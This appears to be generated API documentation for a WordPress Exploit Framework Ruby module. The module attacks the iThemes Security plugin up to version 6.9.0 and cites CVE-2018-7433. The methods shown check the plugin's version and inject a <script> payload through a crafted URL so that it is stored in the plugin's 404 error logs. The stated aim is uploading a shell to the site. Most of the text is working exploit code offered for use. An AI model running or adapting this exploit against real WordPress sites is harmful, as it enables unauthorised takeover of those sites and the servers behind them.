class Wpxf::Exploit::IthemesSecurityV690StoredXssShellUpload
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::StoredXss::new
# File lib/wpxf/modules/exploit/xss/stored/ithemes_security_v6.9.0_stored_xss_shell_upload.rb, line 6 def initialize super update_info( name: 'iThemes Security <= 6.9.0 Unauthenticated Stored XSS Shell Upload', author: [ 'Paweł Kuryłowicz', # Disclosure 'rastating' # WPXF module ], references: [ ['WPVDB', '9037'], ['CVE', '2018-7433'] ], date: 'Oct 06 2016' ) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/ithemes_security_v6.9.0_stored_xss_shell_upload.rb, line 23 def check check_plugin_version_from_readme('better-wp-security', '6.9.1') end
expected_status_code_after_store()
click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/ithemes_security_v6.9.0_stored_xss_shell_upload.rb, line 27 def expected_status_code_after_store 404 end
store_script()
click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/ithemes_security_v6.9.0_stored_xss_shell_upload.rb, line 35 def store_script execute_get_request( url: "#{full_uri}?p=#{Wpxf::Utility::Text.rand_numeric(11)}&<script>#{xss_include_script}</script>" ) end
vulnerable_page()
click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/ithemes_security_v6.9.0_stored_xss_shell_upload.rb, line 31 def vulnerable_page 'the 404 error logs' end